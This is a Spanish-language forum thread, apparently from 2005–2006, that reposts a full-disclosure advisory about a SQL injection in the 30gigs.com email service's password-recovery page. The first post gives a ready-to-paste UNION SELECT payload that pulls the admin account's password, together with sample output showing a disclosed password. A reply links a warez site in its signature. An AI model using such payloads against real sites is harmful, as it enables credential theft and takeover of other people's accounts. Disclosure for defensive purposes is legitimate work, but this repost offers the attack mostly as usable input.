Aclantis

Viernes, 09 de Enero del 2009

Tagline gratis de hoy: Capítulo 12 => Ecología: Cómo deshacerse de Windows sin contaminar

Crear Una Cuenta

Menú Principal

Inicio (Noticias):

Inicio

Enviar Noticia

Búscar

Topicos

Miembros:

Tu Cuenta

Comunidad:

Recetas de Cocina Gratis

Juegos Gratis

Webs Amigas

Trucos de Informática

Guías y Análisis de Juegos

Publicidad y Intercambios

Referirnos

Contáctenos

Web Links

Descargas

Estadísticas:

Estadísticas

Site Map

Top 20

Encuestas

Documentaciones:

Artículos

Agregar a Favoritos

Herramientas WebMasters

FAQ De Aclantis

Recomendados

Noticias recientes

Miércoles, 07 enero
·	Firmas tecnológicas buscarán fusiones y compras seguras en 2009
·	Cambios en la iTunes Store: Todas las canciones estarán libres de DRM
·	Apple desvela iWork 09
·	Motorola presenta el primer móvil fabricado con material reciclado de botellas
·	Apple presenta iLife 09
·	A través del móvil acosan a mujeres en el metro de México
·	Decepción total en la última keynote de Apple
·	Intel y Adobe ampliarán la plataforma Flash para TV
·	Conoce los mejores campos de golf de la Riviera Maya
Martes, 06 enero
·	Wii Sports se convierte en el juego más vendido de la historia

Artículos Viejos

Aclantis: Forums

Aclantis :: Ver tema - 30gigs SQL injection vulnerability

Foros de discusión -> Bugs & Exploits -> 30gigs SQL injection vulnerability
	Ver tema anterior :: Ver tema siguiente

30gigs SQL injection vulnerability

Publicado: Dom Nov 20, 2005 8:46 pm

Merda

Junior, recien llegado

Registrado: Nov 11, 2005

Mensajes: 44

Pues eso, aqui lo tienen:

Cita:

I found a sql injection vulnerability, which leads to password disclosure in
30gigs.com <http://30gigs.com> email service.
The vulnerability exists in http://www.30gigs.com/getpassword/ page due to
lack of validation of user submitted data.
Proof of Concept:
enter http://www.30gigs.com/getpassword/
and copy & paster this code in the Login field, finally submit the form.

not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin

it will give an output like below, in which "runsit" corresponds to the
password of account "admin"
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin_at_30gigs.com account to runsit

The site has been notified about the vulnerability 2 weeks ago, but no
response was taken.

Descubierto por: http://seclists.org/lists/fulldisclosure/2005/Nov/0523.html

Publicado: Dom Ene 01, 2006 5:22 pm

Tor_victor_

Esqueleto, fiel a Aclantis.

Registrado: Jan 18, 2004

Mensajes: 1607

Ubicación: ..::En Mi Pc, o en el tuyo...::..

no poes lo tomare en cuenta para mi correo jeje tengo invitaciones para este mail asi ke el ke kiera mandanme un mp som 8 las ke tengo

_________________
img]http://img358.imageshack.us/img358/3313/firma2qi.jpg[/img]
www.Kozyowarez.com

30gigs SQL injection vulnerability

Foros de discusión -> Bugs & Exploits

Puede publicar nuevos temas en este foro
No puede responder a temas en este foro
No puede editar sus mensajes en este foro
No puede borrar sus mensajes en este foro
No puede votar en encuestas en este foro

Todas las horas son GMT + 10 Horas
Página 1 de 1

Forums ©

Theme Design By Aclantis Hosting

[ Script generation time: 0.318s (PHP: 94% - SQL: 6%) ] - [ SQL queries: 23 ] - [ Pages served in past 5 minutes : 288 ] - [ GZIP disabled ] - [ Debug on ]